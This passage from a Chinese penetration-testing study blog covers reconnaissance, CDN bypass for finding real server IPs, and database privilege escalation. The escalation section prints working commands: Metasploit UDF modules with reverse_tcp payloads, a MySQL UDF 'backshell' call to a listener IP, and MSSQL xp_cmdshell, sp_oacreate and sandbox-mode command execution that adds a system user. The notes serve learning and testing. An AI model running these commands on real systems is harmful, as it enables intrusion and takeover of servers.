<a target="_blank" rel="noopener" href="https://fofa.info/">https://fofa.info/</a></li>
<li>鹰图<br>
<a target="_blank" rel="noopener" href="http://hunter.qianxin.com/"> http://hunter.qianxin.com/</a></li>
<li>360<br>
<a target="_blank" rel="noopener" href="https://quake.360.cn/quake/#/index">https://quake.360.cn/quake/#/index</a></li>
<li>钟馗之眼<br>
<a target="_blank" rel="noopener" href="https://www.zoomeye.org/?R1nG"> https://www.zoomeye.org/?R1nG</a></li>
</ol>
<ul>
<li>威胁情报</li>
</ul>
<ol>
<li>微步在线<br>
<a target="_blank" rel="noopener" href="https://x.threatbook.cn/"> https://x.threatbook.cn/</a></li>
<li>奇安信<br>
<a target="_blank" rel="noopener" href="https://ti.qianxin.com/"> https://ti.qianxin.com/</a></li>
<li>360<br>
<a target="_blank" rel="noopener" href="https://ti.360.cn/#/homepage">https://ti.360.cn/#/homepage</a></li>
</ol>
<ul>
<li>指纹识别<br>
根据这个厂商开发出的产品，比如 CMS 等进行详细拆分，提取指纹信息（标题指纹、关键字指纹、图标指纹）</li>
</ul>
<h3><span id="源码泄露"> 源码泄露</span></h3>
<p>这一块感觉有点社会工程学，主要从一些特殊的点和程序员” 不太友好 “的习惯入手。<br>
这点还很考究缘分，你得看这个网站具体怎么写的，有过开发经验的小伙伴们很容易知道，快速开发要么依赖于框架或者一些现有的框架进行改动，再或者就是自己开发，自己开发这种就很难获取源码了。</p>
<ol>
<li>版本控制系统源码泄露<br>
<a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/124398.html"> https://www.secpulse.com/archives/124398.html</a></li>
</ol>
<ul>
<li>.git 信息泄露<br>
这篇文章是我在刷 BUU 的时候看到的，感觉写的挺不错的。<br>
<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/267597.html">https://www.freebuf.com/articles/web/267597.html</a></li>
</ul>
<ol start="2">
<li>
<p>备份文件<br>
管理员将网站源代码备份在 Web 目录下，攻击者通过猜解文件路径，下载备份文件，导致源代码泄露。<br>
常见的备份文件后缀：zip、rar、tar.gz 等<br>
这个可以使用爆破思想，猜解文件路径，获取备份文件。</p>
</li>
<li>
<p>一些配置文件泄露<br>
这个主要是经验问题了<br>
 WEB-INF/web.xml 泄露</p>
</li>
<li>
<p>开源网站信息泄露<br>
就是社工吧，根据一些关键词利用相关开源网站的搜索语法搜索。</p>
</li>
</ol>
<ul>
<li>
<p>gitee<br>
<a target="_blank" rel="noopener" href="https://gitee.com/">https://gitee.com/</a></p>
</li>
<li>
<p>github<br>
<a target="_blank" rel="noopener" href="https://github.com/">https://github.com/</a></p>
</li>
<li>
<p>互站<br>
<a target="_blank" rel="noopener" href="https://www.huzhan.com/"> https://www.huzhan.com/</a></p>
</li>
</ul>
<h3><span id="js-架构"> JS 架构</span></h3>
<p>这里的核心思想主要就是 js 代码白盒测试，js 代码可以直接查看，在开发时候可能会有敏感信息（手机号、邮箱、用户名等）泄露，还有一些加密方式，再者就是一些 URL 或者未授权接口等信息会被扫出来。<br>
一般的常规方式有这样几个：</p>
<ul>
<li>
<p>手工搜索<br>
锁定敏感的 js 文件，进入代码里面查询想要的信息。</p>
</li>
<li>
<p>半自动化 Burp 分析<br>
自带功能：Target-&gt;sitemap-&gt;Engagement tools-&gt;Find scripts</p>
</li>
<li>
<p>自动化<br>
插件：findsomething</p>
</li>
</ul>
<h3><span id="端口-amp-蜜罐-amp-waf"> 端口 &amp; 蜜罐 &amp; WAF</span></h3>
<ol>
<li>端口扫描的意义<br>
一般会使用端口扫描工具，比如 Nmap 扫描端口开放情况。有很多服务和应用是一些熟悉的端口，或者是部署的人不改端口，识别到这个端口又结合相关应用爆出的漏洞就可以进一步渗透测试，同时还可以根据扫描出来的端口开放情况进一步了解 web 架构。</li>
</ol>
<p>参考连接：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/tdcqma/p/5692546.html">https://www.cnblogs.com/tdcqma/p/5692546.html</a></p>
<p>该篇文章文章主要介绍了 nmap 最主要的四个功能：主机扫描、端口扫描、版本侦测、操作系统侦测。并且对扫描探测原理做了较为详细的介绍，大概思想是根据网络通信发包根据请求情况进行辨别，并且根据不同协议特点，有准确不准确，全扫描半扫描秘密扫描等一系列情况。</p>
<ol start="2">
<li>WAF</li>
</ol>
<ul>
<li>
<p>云 WAF<br>
 百度安全宝、阿里云盾、长亭雷池，华为云，亚马逊云等</p>
</li>
<li>
<p>硬件 WAF<br>
 绿盟、安恒、深信服、知道创宇等公司商业产品</p>
</li>
<li>
<p>软件 WAF<br>
 宝塔，安全狗、D 盾等</p>
</li>
<li>
<p>代码级 WAF<br>
 自己写的 waf 规则，防止出现注入等，一般是在代码里面写死的</p>
</li>
</ul>
<p><img src="https://github.com/my011215/my011215.github.io/blob/main/image/394.png?raw=true" alt></p>
<p>识别 WAF 的意义：<br>
绕（不在南墙不回头）？or 放弃</p>
<ol start="3">
<li>蜜罐<br>
（1）根据蜜罐与攻击者之间进行的交互的程度可以将蜜罐分为三类</li>
</ol>
<ul>
<li>
<p>低交互蜜罐</p>
</li>
<li>
<p>中交互蜜罐</p>
</li>
<li>
<p>高交互蜜罐<br>
根据蜜罐模拟的目标进行分类</p>
</li>
<li>
<p>数据库蜜罐</p>
</li>
<li>
<p>工控蜜罐</p>
</li>
<li>
<p>物联网蜜罐</p>
</li>
<li>
<p>Web 蜜罐</p>
</li>
</ul>
<p>（2）识别原理<br>
参考：<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/jPz9hBmUypFyQlU27vglUg">https://mp.weixin.qq.com/s/jPz9hBmUypFyQlU27vglUg</a></p>
<h3><span id="cdn-绕过"> CDN 绕过</span></h3>
<p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/zxEH-HMqKukmq7qXfrdnQQ">https://mp.weixin.qq.com/s/zxEH-HMqKukmq7qXfrdnQQ</a></p>
<p>超级 Ping：<a target="_blank" rel="noopener" href="http://www.17ce.com/">http://www.17ce.com/</a><br>
 超级 Ping：<a target="_blank" rel="noopener" href="https://ping.chinaz.com/">https://ping.chinaz.com/</a><br>
 接口查询：<a target="_blank" rel="noopener" href="https://get-site-ip.com/">https://get-site-ip.com/</a><br>
 接口查询：<a target="_blank" rel="noopener" href="https://fofa.info/extensions/source">https://fofa.info/extensions/source</a><br>
 国外请求：<a target="_blank" rel="noopener" href="https://tools.ipip.net/cdn.php">https://tools.ipip.net/cdn.php</a><br>
 国外请求：<a target="_blank" rel="noopener" href="https://boce.aliyun.com/detect/">https://boce.aliyun.com/detect/</a><br>
IP 社区库：<a target="_blank" rel="noopener" href="https://www.cz88.net/geo-public">https://www.cz88.net/geo-public</a><br>
 全网扫描：<a target="_blank" rel="noopener" href="https://github.com/Tai7sy/fuckcdn">https://github.com/Tai7sy/fuckcdn</a><br>
 全网扫描：<a target="_blank" rel="noopener" href="https://github.com/boy-hack/w8fuckcdn">https://github.com/boy-hack/w8fuckcdn</a><br>
 全网扫描：<a target="_blank" rel="noopener" href="https://github.com/Pluto-123/Bypass_cdn">https://github.com/Pluto-123/Bypass_cdn</a></p>
<ol>
<li>解析大致过程</li>
</ol>
<ul>
<li>
<p>普通域名解析<br>
用户访问域名–&gt; 解析服务器获取目标 IP–&gt; 访问目标主机</p>
</li>
<li>
<p>普通 CDN 解析<br>
用户访问域名–&gt; 解析服务器获取 CDNIP–&gt;CDN 节点–&gt; 真实服务器 IP–&gt; 访问目标主机<br>
 CDN 最大的特点就是加速和负载均衡<br>
加速是因为有一些不变的静态资源会缓存放在 CDN 节点，负载均衡则是对各个地方的请求根据地区有不同的 CDN 节点（看用户选择配置，地区、全国、全球）</p>
</li>
<li>
<p>带 WAF 的 CDN<br>
 用户访问域名–&gt; 解析服务器获取 CDNIP–&gt;CDN 节点–&gt;WAF 节点 -&gt; 真实服务器 IP–&gt; 访问目标主机</p>
</li>
</ul>
<ol start="2">
<li>CDN 加速配置流程</li>
</ol>
<ul>
<li>
<p>配置 1<br>
 加速域名 - 需要启用加速的域名</p>
</li>
<li>
<p>配置 2<br>
 加速区域 - 需要启用加速的地区</p>
</li>
<li>
<p>配置 3<br>
 加速类型 - 需要启用加速的资源</p>
</li>
</ul>
<ol start="3">
<li>常见绕过方法</li>
</ol>
<ul>
<li>
<p>子域名<br>
配置 1<br>
 加速域名 - 需要启用加速的域名，有可能没有给子域名配置 CDN 加速，导致暴露真实 CDN。</p>
</li>
<li>
<p>邮件系统<br>
一般大型网站自己部署架设的邮件服务器如果向外部用户发送邮件的话，如果中间未经任何数据处理和防护措施，那么邮件头部的源码中会包含此邮件服务器的真实 IP 地址。<br>
RSS 订阅<br>
邮箱注册、激活处<br>
邮箱找回密码处<br>
产品更新的邮件推送<br>
某业务执行后发送的邮件通知<br>
员工邮箱、邮件管理平台等入口处的忘记密码</p>
</li>
<li>
<p>国外访问<br>
配置 2<br>
 加速区域 - 需要启用加速的地区<br>
有可能配置区域不是全球，可以用国外代理 IP 访问泄露真实 IP。</p>
</li>
<li>
<p>证书查询<br>
证书颁发机构 (CA) 必须将他们发布的每个 SSL/TLS 证书发布到公共日志中，SSL/TLS 证书通常包含域名、子域名和电子邮件地址。<br>
我们可以解析 IP：443 发送的证书，获取到比较准确的域名信息。</p>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">from requests.packages.urllib3.contrib import pyopenssl as reqs</span><br><span class="line"></span><br><span class="line">ip=&#x27;220.181.38.148&#x27;</span><br><span class="line">port=&#x27;443&#x27;</span><br><span class="line">try:    </span><br><span class="line">    x509 = reqs.OpenSSL.crypto.load_certificate(</span><br><span class="line">        reqs.OpenSSL.crypto.FILETYPE_PEM,</span><br><span class="line">        reqs.ssl.get_server_certificate((ip, port))</span><br><span class="line">    )</span><br><span class="line">    domain = x509.get_subject().CN</span><br><span class="line">    print(domain)</span><br><span class="line">except:</span><br><span class="line">    print(ip+&#x27;&gt;Get CN failed&#x27;</span><br></pre></td></tr></table></figure>
<p>可以 IP 反查得到域名和证书对比。</p>
<ul>
<li>
<p>敏感文件泄露<br>
服务器日志文件<br>
探针文件，例如 phpinfo<br>
 网站备份压缩文件<br>
.DS_Store<br>
.hg<br>
.git<br>
SVN<br>
Web.xml</p>
</li>
<li>
<p>通过变更域名和历史域名<br>
之前的域名由于没过期，可能未使用 CDN，因此可以直接获得服务器 IP</p>
</li>
<li>
<p>过 APP 移动端应用<br>
如果网站存在 APP ，可以通过抓包分析其 APP 的数据流量，看是否能找到网站真实 IP 地址，记得关注 APP 的历史版本，里面会有很多 surprise 。</p>
</li>
<li>
<p>通过 F5 LTM 解码<br>
 LTM 是将所有的应用请求分配到多个节点服务器上。提高业务的处理能力，也就是负载均衡。</p>
</li>
</ul>
<p>当服务器使用 F5 LTM 做负载均衡时，通过对 set-cookie 关键字的解码，可以获取服务器真实 ip 地址。</p>
<ul>
<li>
<p>空间测绘</p>
</li>
<li>
<p>以量打量<br>
 ddos 流量耗尽</p>
</li>
</ul>
<h2><span id="提权"> 提权</span></h2>
<p>感觉提权大致可以分为这样几个阶段<br>
后台权限–&gt; 网站权限–&gt; 数据库权限–&gt; 系统权限–&gt; 域控权限</p>
<ul>
<li>
<p>后台权限<br>
可以根据登录框相关漏洞进入后台</p>
</li>
<li>
<p>网站权限<br>
一般为有文件上传，命令或代码执行、反序列化等漏洞可以直接上传 shell 连接网站获取网站权限</p>
</li>
<li>
<p>数据库权限<br>
在获取网站权限或者 sql 注入，信息泄露等情况下，连接数据库获取数据库权限</p>
</li>
<li>
<p>系统权限<br>
由网站权限或者或者数据库漏洞或者利用 RCE 反弹 shell 等高危漏洞直接获取系统（服务器）权限，这里系统还得看具体是 windows 还是 linux 不同用户权限也不一样，根据具体的系统权限和操作系统版本可以利用系统高危漏洞进行攻击，造成服务器瘫痪或者进一步后渗透获取域控权限。</p>
</li>
</ul>
<ol>
<li>
<p>Linux：<br>
管理员 UID 为 0：系统的管理员用户。<br>
系统用户 UID 为 1～999：Linux 系统为了避免因某个服务程序出现漏洞而被黑客提权至整台服务器<br>
默认服务程序会由独立的系统用户负责运行，进而有效控制被破坏范围。<br>
普通用户 UID 从 1000 开始：是由管理员创建的用于日常工作的用户。</p>
</li>
<li>
<p>Windows：<br>
用户及组：system administrator user guest 等</p>
</li>
</ol>
<ul>
<li>
<p>域控权限<br>
高危系统漏洞直达或内网横向渗透转入，域控其他服务安全转入等<br>
可以理解为操作自己的虚拟机</p>
</li>
<li>
<p>接口权限<br>
后台或网站权限后的获取途径：后台（修改配置信息功能点），网站权限（查看的配置文件获取）<br>
结合接口未授权和一些命令执行等漏洞可以进一步提权</p>
</li>
</ul>
<h3><span id="后台权限"> 后台权限</span></h3>
<p>登录框相关漏洞</p>
<ol>
<li>
<p>信息泄露<br>
 kyan 访问 host 路由可以获取登录用户名和密码。<br>
源码泄露，查看 JS 代码等可能会残留用户名和密码<br>
报错信息泄露存在用户名</p>
</li>
<li>
<p>默认产品密码<br>
部署上线人员未更改默认产品密码可以使用默认的直接登录。（panabit 网关登录）</p>
</li>
<li>
<p>xss 漏洞<br>
可能存在反射型 xss 或者存储型 xss，两者利用不同，第一种需要结合社工发送给用户登录进而从 xss 平台获取 cookie，第二种存入数据库，只要有用户登录我就可以直接获取用户 cookie 进而登录。（Citrix ADC and Citrix Gateway CVE-2023-24488 跨站脚本漏洞）</p>
</li>
<li>
<p>sql 注入<br>
万能密码（用友畅捷通 GNRemote.dll SQL 注入漏洞）、各种注入类型爆出用户名和密码进行登录。</p>
</li>
<li>
<p>结合未授权漏洞<br>
 smartbi 对接口未授权访问同时结合逻辑漏洞，先获取 token 发送到服务器，然后根据 token 获取正确 session 即可登录。</p>
</li>
<li>
<p>登录逻辑漏洞</p>
</li>
</ol>
<ul>
<li>
<p>密码可以爆破<br>
主要是回显值不同可以控制账号不变，根据密码进行字典爆破从，从而根据包的大小进行爆破。</p>
</li>
<li>
<p>验证码容易绕过<br>
有规律的验证码，或者验证码可以根据某个接口每次提前获取，验证码未失效或者销毁不及时</p>
</li>
<li>
<p>登录逻辑有缺陷<br>
安恒明御防火墙访问特定接口后访问登录界面可以以管理员身份成功登录 24h</p>
</li>
<li>
<p>弱密码<br>
比如 admin/123456</p>
</li>
<li>
<p>任意用户注册登录<br>
对填写手机号邮箱未作识别等</p>
</li>
<li>
<p>越权<br>
密码重置链接可以预测未鉴权可以修改后登录</p>
</li>
<li>
<p>任意用户密码修改<br>
奇安信网神 SecSSL VPN 任意用户密码修改漏洞<br>
修改密码后进行登录</p>
</li>
</ul>
<ol start="7">
<li>跨站请求伪造<br>
同源策略未正确匹配，用户识别不清，在同一个浏览器之前登陆过该网站后点击可以自动携带 cookie 进入对应的网站，攻击者也可以获取 cookie。</li>
</ol>
<h3><span id="数据库权限"> 数据库权限</span></h3>
<h4><span id="mysql-提权"> mysql 提权</span></h4>
<ol>
<li>提权条件</li>
</ol>
<ul>
<li>
<p>数据库帐号密码获取方式<br>
 sqll 注入爆出连接用户名和密码<br>
信息泄露，备份文件， 网站配置文件查看</p>
</li>
<li>
<p>数据库的最高权限用户的密码<br>
使其能够连接数据库，可以先通过网站内联数据库，再通过新增超级用户来外联</p>
</li>
<li>
<p>secure-file-priv 没进行目录限制<br>
如果为空，不做目录限制，即任何目录均可以。<br>
如果指定了目录，MySQL 会限制只能从该目录导入、或导出到该目录。目录必须已存在，MySQL 不会自动创建该目录。<br>
如果设置为 NULL，MySQL 服务器禁止导入与导出功能。</p>
</li>
</ul>
<ol start="2">
<li>UDF 提权<br>
（1）MSF 自动化提权</li>
</ol>
<ul>
<li>
<p>密码成功连接数据库</p>
</li>
<li>
<p>外联权限</p>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GRANT ALL PRIVILEGES ON *.* TO &#x27;帐号&#x27;@&#x27;%&#x27; IDENTIFIED BY &#x27;密码&#x27; WITH GRANT OPTION;</span><br></pre></td></tr></table></figure>
<ul>
<li>查看是否存在目录（高版本则自己创建目录）<br>
mysql&lt;5.2 导出目录 c:/windows 或 system32<br>
mysql=&gt;5.2 导出安装目录 /lib/plugin/</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select version();</span><br></pre></td></tr></table></figure>
<p>使用 MSF 中的 exploit/multi/mysql/mysql_udf_payload 模块可以进行 UDF 提权<br>
 MSF 会将 dll 文件写入 lib\plugin\ 目录下 (前提是该目录存在，需手工创建), 该 dll 文件中包含 sys_exec () 和 sys_eval () 两个函数，但是默认只创建 sys_exec () 函数，该函数执行并不会有回显。我们可以手动创建 sys_eval () 函数，来执行有回显的命令。<br>
rport 默认 3306</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/mysql/mysql_udf_payload</span><br><span class="line">set payload windows/meterpreter/reverse_tcp</span><br><span class="line">set password root</span><br><span class="line">set rhosts 47.102.195.100</span><br><span class="line">set rport 3386</span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<p>连接数据库进行命令执行（提权到系统）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select * from mysql.func where name = &quot;sys_exec&quot;; //查看</span><br><span class="line">create function sys_eval returns string soname &quot;WqkerHcA.dll &quot;;//创建函数绑定dll</span><br><span class="line">select sys_eval (&quot;whoami&quot;);//调用函数进行命令执行</span><br></pre></td></tr></table></figure>
<p>（2）手动反弹 shell<br>
 参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43801718/article/details/105493042">https://blog.csdn.net/weixin_43801718/article/details/105493042</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">use mysql;</span><br><span class="line">set @a=concat(&#x27;&#x27;,</span><br><span class="line">create table Ghost(data LONGBLOB);</span><br><span class="line">insert into Ghost values(&quot;&quot;);update Ghost set data = @a;</span><br><span class="line">select data from Ghost into DUMPFILE &#x27;C:\\phpstudy\\PHPTutorial\\MySQL\\lib\\plugin\\udf.dll&#x27;;</span><br><span class="line">create function backshell returns string soname &#x27;udf.dll&#x27;;</span><br><span class="line">select backshell(&#x27;47.94.236.117&#x27;,7788)</span><br></pre></td></tr></table></figure>
<ol start="3">
<li>启动项提权<br>
 msf</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">use exploit/windows/mysql/mysql_start_up</span><br><span class="line">set rhosts 47.102.195.100</span><br><span class="line">set username root</span><br><span class="line">set password root</span><br><span class="line">run</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h4><span id="mssql-提权"> MSSQL 提权</span></h4>
<p>参考：<a target="_blank" rel="noopener" href="https://blog.51cto.com/11797152/2411770">https://blog.51cto.com/11797152/2411770</a></p>
<ol>
<li>使用 xp_cmdshell 进行提权<br>
 xp_cmdshell 默认在 mssql2000 中是开启的，在 mssql2005 之后的版本中则默认禁止。如果用户拥有管理员 sa 权限则可以用 sp_configure 重修开启它。</li>
</ol>
<ul>
<li>启用：</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">EXEC sp_configure &#x27;show advanced options&#x27;, 1</span><br><span class="line">RECONFIGURE;</span><br><span class="line">EXEC sp_configure &#x27;xp_cmdshell&#x27;, 1;</span><br><span class="line">RECONFIGURE;</span><br></pre></td></tr></table></figure>
<ul>
<li>关闭：</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">exec sp_configure &#x27;show advanced options&#x27;, 1;</span><br><span class="line">reconfigure;</span><br><span class="line">exec sp_configure &#x27;xp_cmdshell&#x27;, 0;</span><br><span class="line">reconfigure;</span><br></pre></td></tr></table></figure>
<ul>
<li>执行：</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">EXEC master.dbo.xp_cmdshell &#x27;命令&#x27;</span><br></pre></td></tr></table></figure>
<p>如果 xp_cmdshell 被删除了，可以上传 xplog70.dll 进行恢复</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exec master.sys.sp_addextendedproc &#x27;xp_cmdshell&#x27;, &#x27;C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll&#x27;</span><br></pre></td></tr></table></figure>
<ol start="2">
<li>使用 sp_oacreate 进行提权<br>
主要是用来调用 OLE 对象，利用 OLE 对象的 run 方法执行系统命令。</li>
</ol>
<ul>
<li>启用：</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">EXEC sp_configure &#x27;show advanced options&#x27;, 1;   </span><br><span class="line">RECONFIGURE WITH OVERRIDE;   </span><br><span class="line">EXEC sp_configure &#x27;Ole Automation Procedures&#x27;, 1;   </span><br><span class="line">RECONFIGURE WITH OVERRIDE;   </span><br></pre></td></tr></table></figure>
<ul>
<li>关闭：</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">EXEC sp_configure &#x27;show advanced options&#x27;, 1;</span><br><span class="line">RECONFIGURE WITH OVERRIDE;   </span><br><span class="line">EXEC sp_configure &#x27;Ole Automation Procedures&#x27;, 0;   </span><br><span class="line">RECONFIGURE WITH OVERRIDE;  </span><br></pre></td></tr></table></figure>
<ul>
<li>执行：</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">declare @shell int exec sp_oacreate &#x27;wscript.shell&#x27;,@shell output exec sp_oamethod @shell,&#x27;run&#x27;,null,&#x27;c:\windows\system32\cmd.exe /c whoami &gt;c:\\1.txt&#x27;</span><br></pre></td></tr></table></figure>
<ol start="3">
<li>使用 SQL Server 沙盒提权</li>
</ol>
<ul>
<li>关闭沙盒模式</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">exec sp_configure &#x27;show advanced options&#x27;,1;reconfigure; </span><br><span class="line">exec sp_configure &#x27;Ad Hoc Distributed Queries&#x27;,1;reconfigure;</span><br><span class="line">exec master..xp_regwrite &#x27;HKEY_LOCAL_MACHINE&#x27;,&#x27;SOFTWARE\Microsoft\Jet\4.0\Engines&#x27;,&#x27;SandBoxMode&#x27;,&#x27;REG_DWORD&#x27;,0; </span><br><span class="line"></span><br></pre></td></tr></table></figure>
<ul>
<li>查询沙盒模式等级</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exec master.dbo.xp_regread &#x27;HKEY_LOCAL_MACHINE&#x27;,&#x27;SOFTWARE\Microsoft\Jet\4.0\Engines&#x27;, &#x27;SandBoxMode&#x27;</span><br></pre></td></tr></table></figure>
<p>沙盒模式 SandBoxMode 参数含义（默认是 2）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">`0`：在任何所有者中禁止启用安全模式</span><br><span class="line">`1` ：为仅在允许范围内</span><br><span class="line">`2` ：必须在access模式下</span><br><span class="line">`3`：完全开启</span><br><span class="line">openrowset是可以通过OLE DB访问SQL Server数据库，OLE DB是应用程序链接到SQL </span><br></pre></td></tr></table></figure>
<ul>
<li>执行系统命令（增加系统用户）</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from openrowset(&#x27;microsoft.jet.oledb.4.0&#x27;,&#x27;;database=c:/windows/system32/ias/ias.mdb&#x27;,&#x27;select shell(&quot;net user margin margin /add&quot;)&#x27;) </span><br></pre></td></tr></table></figure>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://my011215.github.io/2023/08/12/Penetration%20testing/%E5%AD%A6%E4%B9%A0%E6%80%9D%E8%80%83/" data-id="cli2xd5rx0000g8tn92wf64l6" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2023/05/14/learning%20share/%E8%B4%A7%E8%BF%90%E7%89%A9%E6%B5%81%E8%A1%A8%E7%94%9F%E6%88%90/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">货运物流表生成</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a><span class="category-list-count">51</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/CTF/">CTF</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E4%B9%A6%E7%B1%8D/">书籍</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E5%AE%9E%E6%88%98/">实战</a><span class="category-list-count">6</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E5%B7%A5%E5%85%B7/">工具</a><span class="category-list-count">10</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E6%80%9D%E7%BB%B4%E5%AF%BC%E5%9B%BE/">思维导图</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a><span class="category-list-count">9</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E6%BC%8F%E6%B4%9E/">漏洞</a><span class="category-list-count">17</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E9%9D%A2%E8%AF%95%E9%A2%98/">面试题</a><span class="category-list-count">4</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E9%9D%A2%E8%AF%95%E9%A2%98/XSS/">XSS</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E9%9D%A2%E8%AF%95%E9%A2%98/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">文件上传漏洞</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E9%9D%A2%E8%AF%95%E9%A2%98/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/">文件包含漏洞</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E9%9D%A2%E8%AF%95%E9%A2%98/%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3/">暴力破解</a><span class="category-list-count">1</span></li></ul></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%89%8D%E7%AB%AF%E5%AD%A6%E4%B9%A0/">前端学习</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%8C%BA%E5%9D%97%E9%93%BE%E5%AE%89%E5%85%A8/">区块链安全</a><span class="category-list-count">1</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%8C%BA%E5%9D%97%E9%93%BE%E5%AE%89%E5%85%A8/%E5%8D%9A%E5%BC%88%E8%AE%BA/">博弈论</a><span class="category-list-count">1</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%AD%A6%E4%B9%A0%E5%88%86%E4%BA%AB/">学习分享</a><span class="category-list-count">15</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%AF%86%E7%A0%81%E5%AD%A6/">密码学</a><span class="category-list-count">1</span></li></ul>
    </div>
  </div>


  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
